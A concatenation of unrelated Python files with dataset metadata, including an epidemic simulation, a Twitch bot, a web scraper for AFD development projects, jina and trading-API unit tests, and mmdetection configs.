e58cfb3de60cd764e85865be181cffa7c8b60191 | 81f2653de884d9b27c4f921ee8b2761ef65098db | /main.py | 8ded70c9b58c8deb91be512a7ffa6b4c6dbc216c | [] | no_license | vnikaski/epidemic_simulation | fa2b084b2281ef34dd200b1bde971a9365afc1f7 | 8aba4ac026bfc4b35405964435512703f7adcba7 | refs/heads/master | 2021-05-19T13:40:37.081479 | 2020-03-31T20:55:47 | 2020-03-31T20:55:47 | 251,729,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,666 | py | import numpy as np
from random import randint, random
from matplotlib import pylab
from matplotlib.animation import FuncAnimation
import argparse
def update_neighbours_for_cell(map: np.array, direction: str, i: int, j: int, r: int):
"""
Updates number of Moore's neighbours in the distance of r from the cell map[i,j]
:param map: map of states
:param direction: 'up', 'down', 'right', 'left'
:param i: row of the cell
:param j: column of the cell
:param r: radius of Moore's neighbourhood
:return: updated map: np.array
"""
a = 0 #sum of infected neighbours in given direction
for k in range(r):
b = k #parameter needed in the while loop to check for the edges of the map
c = k #same as above
if direction == 'up':
while j-b < 0:
b -= 1
while j+c+2 > len(map):
c -= 1
a = sum(map[i,j-b:j+c+2,0]==1)
elif direction == 'down':
while j-b-1 < 0:
b -= 1
while j+c+1 > len(map):
c -= 1
a = sum(map[i, j-b-1:j+c+1, 0]==1)
elif direction == 'left':
while i - b - 1 < 0:
b -= 1
while i + c + 1 > len(map):
c -= 1
a = sum(map[i-b-1:i+c+1, j, 0]==1)
elif direction == 'right':
while i-b < 0:
b -= 1
while i+c+2 > len(map):
c -= 1
a = sum(map[i-b:i+c+2, j, 0]==1)
map[i,j,1] += a
return map
def update_neighbours(map: np.array, r: int):
"""
Goes through all of the map to update neighbours in every direction
:param map: np.array map of states
:param r: radius of infection
:return: updated map np.array
"""
for i in range(len(map)):
for j in range(len(map)):
map = update_neighbours_for_cell(map, 'up', i, j, r)
map = update_neighbours_for_cell(map, 'right', i, j, r)
map = update_neighbours_for_cell(map, 'down', i, j, r)
map = update_neighbours_for_cell(map, 'left', i, j, r)
return map
def main(N: int, k: int, p_w: float, p_z: float, M: int, r: int = 1):
"""
Creates simulation of a spreading infection on a square map. Each cell is in one of the three states:
0 - healthy, capable of getting infected
1 - infected, can spread the infection
2 - cured, no longer spreading, can't get infected
:param N: size of the edge of the square
:param k: number of first randomly infected cells
:param p_w: probability of curing the infection by an infected cell per epoch
    :param p_z: probability of getting the infection from an infected neighbour cell (changes with the number of infected neighbours)
:param M: number of epochs
    :param r: radius of infection spread
"""
map = np.zeros((N,N,2)) #creating map; every cell has two dimensions: [state, number_of_infected_neighbours]
while k > 0: #choosing randomly k infected people
i = randint(0, N-1)
j = randint(0, N-1)
if map[i,j,0] == 0:
map[i,j,0] = 1
k -= 1
    map = update_neighbours(map, r) #updating infected-neighbour counts after the random initial infection
count = {0: [sum(sum(map[:, :, 0] == 0))], 1: [sum(sum(map[:, :, 0] == 1))], 2: [sum(sum(map[:, :, 0] == 2))]}
#preparing for data storage needed for the animation
maps = np.zeros((N, N, M))
maps[:, :, 0] = map[:, :, 0]
for e in range(M): #iterating through epochs
        for i in range(N): #going through rows of the map; i = row index
            for j in range(N): #going through columns of the map; j = column index
                if map[i,j,0] == 0 and map[i,j,1]>0 and random() < 1-(1-p_z)**map[i,j,1]: #trying to infect cell with probability 1-(1-p_z)**(number of infected neighbours)
map[i,j,0] = 1
elif map[i,j,0] == 1 and random() < p_w: #trying to heal infected cell
map[i,j,0] = 2
update_neighbours(map, r)
#counting epoch stats
count[0].append(sum(sum(map[:, :, 0] == 0)))
count[1].append(sum(sum(map[:, :, 0] == 1)))
count[2].append(sum(sum(map[:, :, 0] == 2)))
#drawing and saving heatmaps of map state in the epoch
pylab.imshow(map[:,:,0])
pylab.savefig(f"map{e+1}")
pylab.clf()
#saving data for animation
maps[:,:,e] = map[:,:,0]
if sum(sum(map[:,:,0])) == (N**2)*2: #checking whether everyone is cured to end simulation
break
pylab.plot(count[0], label='healthy')
pylab.plot(count[1], label='infected')
pylab.plot(count[2], label='cured')
pylab.legend(loc='upper right')
pylab.xlabel('epoch')
pylab.savefig(f"plot.png")
pylab.clf()
#preparing for animation
fig = pylab.figure()
im = pylab.imshow(maps[:, :, 0])
def init():
im.set_data(np.zeros((N, N)))
def animate(i):
data = maps[:, :, i]
im.set_data(data)
return im
#animation
anim = FuncAnimation(fig, animate, init_func=init, frames=M, repeat=False)
anim.save('spreading.gif', writer='imagemagick')
"""
There was an attempt to use the argparse library, but when run from the terminal it reported strange errors in the code that normally were not there + it could not see the numpy library?
It is possible that the commented-out code works, just not on my computer, so I went with the non-preferred solution
"""
#parser = argparse.ArgumentParser()
#parser.add_argument("N", help="size of the map",type=int)
#parser.add_argument("k", help="number of infected cells",type=int)
#parser.add_argument("p_w", help="probability of curing the infection",type=float)
#parser.add_argument("p_z", help="probability of spreading the infection",type=float)
#parser.add_argument("M", help="number of epochs",type=int)
#parser.add_argument("r", help="radius of spreadage",type=int)
#args = parser.parse_args()
#main(args)
#Getting the data for simulation from the user
N = int(input("Set the size of the map (N): "))
k = int(input("Set the number of infected cells (k): "))
p_w = float(input("Set the probability of curing infection (p_w): "))
p_z = float(input("Set the probability of getting infected (p_z): "))
M = int(input("Set how many epochs should the simulation take (M): "))
r = input("Set the radius of spreading the infection (r), if not provided: r=1: ")
if r =='':
main(N,k,p_w,p_z,M)
else:
main(N,k,p_w,p_z,M,int(r))
| [
"[email protected]"
] | |
fe349e425c50cb0f517d63394f143894ac478af4 | 12e90368507792ef0ed9152d0b23852979455f95 | /src/run.py | a4a573d5a364ca56397c4bae87218ec87c162b40 | [] | no_license | KomorIksDe/KocchiBot--Twitch | a8dd8c670b4924e94729b26b86d5d61de47e901f | 075332eae8a569a12e1e729992550f5be8ed14ac | refs/heads/master | 2021-01-09T05:56:54.845886 | 2017-02-03T21:37:49 | 2017-02-03T21:37:49 | 80,871,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | import socket
import string
import time
from cfg import *
from bot import readMessage
sock = initSocket()
start = int(time.time())
while True:
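    # Twitch IRC lines look like ":nick!user@host PRIVMSG #channel :text", so
    # after splitting on ':' the prefix/command ends up in parts[1] and the
    # message body in parts[2].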
for line in str(sock.recv(1024)).split('\\r\\n'):
parts = line.split(':')
if len(parts) < 3:
continue
if "QUIT" not in parts[1] and "JOIN" not in parts[1] and "PART" not in parts[1]:
message = parts[2][:len(parts[2])]
usernamesplit = parts[1].split("!")
username = usernamesplit[0]
readMessage(sock, message, username, start)
timePassed = time.time() | [
"[email protected]"
] | |
e3890f86efe95e867f60a04ad1fb1640b5b9c625 | 6a253ee7b47c5f70c826bbc97bb8e33cd1dab3b6 | /4.Working with Dask Bags for Unstructured Data/Filtering vetoed bills.py | f6f1b993c692dc6f8cda3afb05d26a40595ed1aa | [] | no_license | Mat4wrk/Parallel-Programming-with-Dask-in-Python-Datacamp | 19a646d6d16ff46173964c25639ff923407c8f32 | 535f69b78adb50cffc7f402f81ddff19f853eea1 | refs/heads/main | 2023-03-06T19:52:39.495066 | 2021-02-13T13:27:06 | 2021-02-13T13:27:06 | 338,565,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Filter the bills: overridden
overridden = bills_dicts.filter(veto_override)
# Print the number of bills retained
print(overridden.count().compute())
# Get the value of the 'title' key
titles = overridden.pluck('title')
# Compute and print the titles
print(titles.compute())
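# Context sketch (assumed, not part of the original exercise): `bills_dicts`
# would be a dask.bag of bill dicts and `veto_override` a plain predicate,
# e.g. (field names hypothetical):
#   import json
#   import dask.bag as db
#   bills_dicts = db.read_text('bills*.json').map(json.loads)
#   def veto_override(bill):
#       return bill['bill_status'] == 'Passed over Governor veto'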
| [
"[email protected]"
] | |
e39c0eb015805450cfadbbbadee7c3c216b162cf | 0e1fbfa23989dd5679d272b12c1e3d2080f2feb2 | /tests/data/config/t.py | 9f085ae675b33900f73434c3a7d631f7f24fb98d | [
"Apache-2.0"
] | permissive | LuGuo1920/mmcv | dae1003f63ce23d5cfc58b27c0c620a61cc5323e | 76d9bf1efb052785fea95cb157288a102976a49e | refs/heads/master | 2023-05-30T08:11:36.148373 | 2021-06-28T09:31:36 | 2021-06-28T09:31:36 | 381,047,895 | 1 | 0 | Apache-2.0 | 2021-06-28T13:49:28 | 2021-06-28T13:49:27 | null | UTF-8 | Python | false | false | 173 | py | _base_ = ['./l1.py', './l2.yaml', './l3.json', './l4.py']
item3 = False
item4 = 'test'
item8 = '{{fileBasename}}'
item9 = {{ _base_.item2 }}
item10 = {{ _base_.item7.b.c }}
| [
"[email protected]"
] | |
f178b663d0ee93882d7f0f23f79762c86c9a62b3 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC028.py | 697b950c9b5b4c9f6d0da0feb24a47bcfb16928d | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC028(xtp_test_case):
# YW_NHG_SHHG_019_GC028
def test_YW_NHG_SHHG_019_GC028(self):
        title = '上海逆回购--数量(等于100万张)-28天'  # Shanghai reverse repo -- quantity (equal to 1,000,000 units) - 28 days
        # Define the expected values for the current test case
        # Expected status: initial, not traded, partially filled, fully filled, partial-cancel reported, partially cancelled, reported pending cancel, cancelled, invalid order, cancel-then-invalidated, internal cancel
        # xtp_ID and cancel_xtpID default to 0 and need not be changed
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
        # Define the order parameters ------------------------------------------
        # Params: ticker, market, security type, security status, trading status, side (B=buy, S=sell), expected status, Api
stkparm = QueryStkPriceQty('204028', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 1000000,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
fb4d4b99fef64675afb65af92c4e6b71f2d5ac46 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/M/markbrough/afd_1.py | 711852c3ee8cd7a769192a8717034ae07c1ec594 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,542 | py | import scraperwiki
from lxml import html
from urllib2 import urlopen, Request, URLError
import re
import string
URL = "http://www.afd.fr/base-projets/listerProjets.action?page=%s"
def cleanURL(data):
expression=re.compile("(\S*);jsessionid=(\S*)\?(\S*)")
d = expression.match(data)
return d.group(1)+"?"+d.group(3)
def cleandata(data):
if data:
newdata = string.strip(data)
else:
newdata=''
return newdata
def cleanamount(data):
eurosign = u"\u20AC"
commas = ','
spaces = '\r\n\t\t\t\t\t'
fixed = re.sub(eurosign, '', data)
fixed = re.sub(commas, '', fixed)
fixed = re.sub(spaces, '', fixed)
return fixed
def removeImage(data):
print "Trying to remove image from", data
fixed = re.sub('<img alt="" src="img/pdf.gif">', '', data)
fixed = re.sub("\r", '', data)
fixed = re.sub("\n", '', data)
fixed = re.sub("\t", '', data)
print "Final data after removing image is", data
return fixed
# utf8 : database_field_name
translations = {
u'Libell\xe9 du projet': 'name',
u'Num\xe9ro de projet': 'id',
u'Pays de r\xe9alisation': 'country',
u'B\xe9n\xe9ficiaire': 'beneficiary',
"Secteur d'intervention": 'aim',
'Agence de gestion': 'agency',
'Classement environnemental': 'environmental_impact',
'Classement social': 'social_impact',
u"Commentaire sur l'\xe9x\xe9cution du projet": 'comment',
'Execution': 'in progress',
'Etat du projet': 'status',
'Montant global du projet': 'funding_total_euros',
"Financement de l'AFD": 'funding_from_afd_euros',
'Forme de concours': 'funding_type',
'Cofinancement': 'is_co_financed',
u"Date d'identification valid\xe9e": 'date_validated',
"Date d'octroi du financement": 'date_funded',
'Chef de projet': 'project_manager',
'Responsable agence': 'responsible_agency',
'Structure responsable': 'responsible_structure',
'non': 'no',
'oui': 'yes',
}
def translate(french_str, warn_if_no_translation=False):
if not french_str:
return ''
if french_str in translations:
return translations[french_str].decode('utf8')
else:
if warn_if_no_translation:
print 'Could not translate: %s = %r' % (french_str, french_str)
return french_str
def scrape_project_page(data, project_url):
req = Request(project_url)
data['project_details'] = project_url
doc = html.parse(urlopen(req))
for tr in doc.findall('//table//tr'):
field = []
for cell_type in ('th', 'td'):
cells = tr.findall(cell_type)
if not cells:
# ignore row <th>Commentaire...</th> with no <td>
# TODO get the pdf links at this point
continue
warn_if_no_translation = cell_type == 'th'
if cells and cells[0].get('colspan') == '2':
# ignore section titles (they span both columns)
break
cells = [translate(cleanamount(cleandata(cell.text)),
warn_if_no_translation) \
for cell in cells]
field.append(' | '.join(cells))
if len(field) == 2:
if not field[0]:
# don't save a blank key
assert not field[1], 'Throwing away data without key: %r' % field[1]
continue
data[field[0]] = field[1]
#print 'SAVE %s : %s' % tuple(field)
document_field = doc.find('//tr//td//div/a')
if document_field is not None:
data["document_url"] = cleanURL("http://www.afd.fr"+document_field.get("href"))
data["document_name"] = document_field.text_content()
print "document name is", cleandata(document_field.text_content())
print "document url is", cleanURL("http://www.afd.fr"+document_field.get("href"))
scraperwiki.sqlite.save(unique_keys=["id"],
data=data)
# loop over the pages of the "liste des projets"
page_number = 0
while True:
page_number += 1
req = Request(URL % (page_number))
try:
response = urlopen(req)
except URLError, e:
# import pdb; pdb.set_trace()
if response.status == 404:
break
doc = html.parse(response)
if not(doc.findall('//tbody//tr')):
break
# loop over each project summary
for tr in doc.findall('//tbody//tr'):
cells = list(tr.findall('td'))
if not len(cells):
continue
amount = re.sub(',', '', cells[2].text)
project_url = 'http://www.afd.fr' + cells[1].find('a').get('href')
data = {
'country' : cleandata(cells[0].text),
'description' : cleandata(cells[1].find('a').text),
'project_url' : cleanURL(project_url),
'funding_total_euros' : cleanamount(cleandata(amount)),
'status' : cleandata(cells[3].text),
'date_updated' : cells[4].text
}
# drill down into the project page
try:
scrape_project_page(data, project_url)
except:
# if that fails, save what we have!
scraperwiki.sqlite.save(unique_keys=["id"],
data=data)
| [
"[email protected]"
] | |
16011c0ebe4ae0b5330d83fc1d4a9a63f5e4b0a1 | 437a0f81f161438bba3554f440364b965fc3f432 | /tests/unit/types/test_document.py | 57d2ae8e6082e82b1cab460573f4c8fb735dc581 | [
"Apache-2.0"
] | permissive | ApurvaMisra/jina | dbbe2873771eafbbdf429c9dd717e26733496d49 | 1ecf2d74179f29f196a964f6d779b1a32bf78e7c | refs/heads/master | 2023-01-24T12:46:27.030417 | 2020-12-03T17:53:41 | 2020-12-03T17:53:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,070 | py | import numpy as np
import pytest
from google.protobuf.json_format import MessageToDict
from jina import NdArray, Request
from jina.proto.jina_pb2 import DocumentProto
from jina.types.document import Document, BadDocID
from tests import random_docs
@pytest.mark.parametrize('field', ['blob', 'embedding'])
def test_ndarray_get_set(field):
a = Document()
b = np.random.random([10, 10])
setattr(a, field, b)
np.testing.assert_equal(getattr(a, field), b)
b = np.random.random([10, 10])
c = NdArray()
c.value = b
setattr(a, field, c)
np.testing.assert_equal(getattr(a, field), b)
b = np.random.random([10, 10])
c = NdArray()
c.value = b
setattr(a, field, c.proto)
np.testing.assert_equal(getattr(a, field), b)
def test_doc_update_fields():
a = Document()
b = np.random.random([10, 10])
c = {'tags': 'string', 'tag-tag': {'tags': 123.45}}
d = [12, 34, 56]
e = 'text-mod'
w = 2.0
a.set_attrs(embedding=b, tags=c, location=d, modality=e, weight=w)
np.testing.assert_equal(a.embedding, b)
assert list(a.location) == d
assert a.modality == e
assert MessageToDict(a.tags) == c
assert a.weight == w
def test_granularity_get_set():
d = Document()
d.granularity = 1
assert d.granularity == 1
def test_uri_get_set():
a = Document()
a.uri = 'https://abc.com/a.jpg'
assert a.uri == 'https://abc.com/a.jpg'
assert a.mime_type == 'image/jpeg'
with pytest.raises(ValueError):
a.uri = 'abcdefg'
def test_set_get_mime():
a = Document()
a.mime_type = 'jpg'
assert a.mime_type == 'image/jpeg'
b = Document()
b.mime_type = 'jpeg'
assert b.mime_type == 'image/jpeg'
c = Document()
c.mime_type = '.jpg'
assert c.mime_type == 'image/jpeg'
def test_no_copy_construct():
a = DocumentProto()
b = Document(a, copy=False)
a.id = '1' * 16
assert b.id == '1' * 16
b.id = '2' * 16
assert a.id == '2' * 16
def test_copy_construct():
a = DocumentProto()
b = Document(a, copy=True)
a.id = '1' * 16
assert b.id != '1' * 16
b.id = '2' * 16
assert a.id == '1' * 16
def test_bad_good_doc_id():
b = Document()
with pytest.raises(BadDocID):
b.id = 'hello'
b.id = 'abcd' * 4
b.id = 'de09' * 4
b.id = 'af54' * 4
b.id = 'abcdef0123456789'
def test_id_context():
with Document() as d:
assert not d.id
d.buffer = b'123'
assert d.id
def test_doc_content():
d = Document()
assert d.content is None
d.text = 'abc'
assert d.content == 'abc'
c = np.random.random([10, 10])
d.blob = c
np.testing.assert_equal(d.content, c)
d.buffer = b'123'
assert d.buffer == b'123'
def test_request_docs_mutable_iterator():
"""To test the weak reference work in docs"""
r = Request()
r.request_type = 'index'
for d in random_docs(10):
r.docs.append(d)
for idx, d in enumerate(r.docs):
assert isinstance(d, Document)
d.text = f'look I changed it! {idx}'
# iterate it again should see the change
doc_pointers = []
for idx, d in enumerate(r.docs):
assert isinstance(d, Document)
assert d.text == f'look I changed it! {idx}'
doc_pointers.append(d)
# pb-lize it should see the change
rpb = r.as_pb_object
for idx, d in enumerate(rpb.index.docs):
assert isinstance(d, DocumentProto)
assert d.text == f'look I changed it! {idx}'
# change again by following the pointers
for d in doc_pointers:
d.text = 'now i change it back'
# iterate it again should see the change
for idx, d in enumerate(rpb.index.docs):
assert isinstance(d, DocumentProto)
assert d.text == 'now i change it back'
def test_request_docs_chunks_mutable_iterator():
"""Test if weak reference work in nested docs"""
r = Request()
r.request_type = 'index'
for d in random_docs(10):
r.docs.append(d)
for d in r.docs:
assert isinstance(d, Document)
for idx, c in enumerate(d.chunks):
assert isinstance(d, Document)
c.text = f'look I changed it! {idx}'
# iterate it again should see the change
doc_pointers = []
for d in r.docs:
assert isinstance(d, Document)
for idx, c in enumerate(d.chunks):
assert c.text == f'look I changed it! {idx}'
doc_pointers.append(c)
# pb-lize it should see the change
rpb = r.as_pb_object
for d in rpb.index.docs:
assert isinstance(d, DocumentProto)
for idx, c in enumerate(d.chunks):
assert isinstance(c, DocumentProto)
assert c.text == f'look I changed it! {idx}'
# change again by following the pointers
for d in doc_pointers:
d.text = 'now i change it back'
# iterate it again should see the change
for d in rpb.index.docs:
assert isinstance(d, DocumentProto)
for c in d.chunks:
assert c.text == 'now i change it back'
| [
"[email protected]"
] | |
2355da4fe0a15ebbd2427a4c7f7b891e2e2ad149 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/pose_estimation/Hourglass_for_PyTorch/mmpose-master/demo/mmdetection_cfg/faster_rcnn_r50_fpn_1x_coco.py | 4fb90266f00299d6ac45e49f928e81c2c3eb7535 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 6,403 | py | # -*- coding: utf-8 -*-
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.001,
step=[8, 11])
total_epochs = 12
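# the classic "1x" schedule: 12 epochs with the lr stepped down at epochs 8 and 11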
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
type='StandardRoIHead',
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
match_low_quality=False,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_threshold=0.5, min_score=0.05)
)
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
| [
"[email protected]"
] | |
dabffd515b7dd2a0abf3bf15380ace94082f2145 | ed2a234be16e5ac95496cd959b531542a087faf6 | /Functions Advanced - Exercise/10. Keyword Arguments Length.py | 1b03e732297da99ed3703c06b09f393e7c4587db | [] | no_license | Spas52/Python_Advanced | efc73eda5d10707f1f1a7407cc697448a985f014 | 7082c8947abba9b348f8372f68d0fc10ffa57fc1 | refs/heads/main | 2023-06-04T13:05:46.394482 | 2021-06-24T00:01:37 | 2021-06-24T00:01:37 | 379,756,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | def kwargs_length(**kwargs):
return len(kwargs) | [
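# example: kwargs_length(a=1, b=2) returns 2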
"[email protected]"
] | |
5aebaeac9d49f1e3296ab91ff35786d10b6a5bc9 | 82e1c98b20f0544b4d8b121f9802c691892afdfc | /WWW.CSE.MSU.EDU/CONTROL/PolygonalNumber.py | 7efdb71bc5ac4a38956e4d78a095dc4f69aa146c | [] | no_license | bang103/MY-PYTHON-PROGRAMS | 14d7876bd9a232285e971b42479251537e472e59 | e407a39ffa35d1ce87bc1846807bf446717c4b24 | refs/heads/master | 2021-01-17T13:32:42.097396 | 2016-07-11T14:34:29 | 2016-07-11T14:34:29 | 40,480,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | #August 12, 2015
#http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/
from __future__ import print_function
import math
print("On input of a perfect square, Output the two triangles that make up the square.")
while True:
inp=raw_input("Input Q/q to Quit OR Input a perfect square ---> ")
try:
fnumber=float(inp)
except:
if inp.lower()=="q":
print("Bye and Thank you")
break
else:
print("Invalid input: input contains non-numeric characters")
continue
inp2=str(fnumber)
index=inp2.find(".")
dec=inp2[index+1:]
    if int(dec)==0: #a positive integer has been input
        sqnumber=int(fnumber)
        root=int(round(math.sqrt(sqnumber))) if sqnumber>=0 else -1
        if root*root!=sqnumber: # reject negatives and non-squares
            print("Invalid input: only perfectly square positive integers accepted")
            continue
        n=root
        t1=int((n*n+n)/2)
        t2=int(((n-1)*(n-1)+(n-1))/2)
        print ("The Square Number %d is made up of Two Triangular numbers %d and %d"% (sqnumber,t1,t2))
else:
print("Invalid input: only perfectly square positive integers accepted")
continue
| [
"[email protected]"
] | |
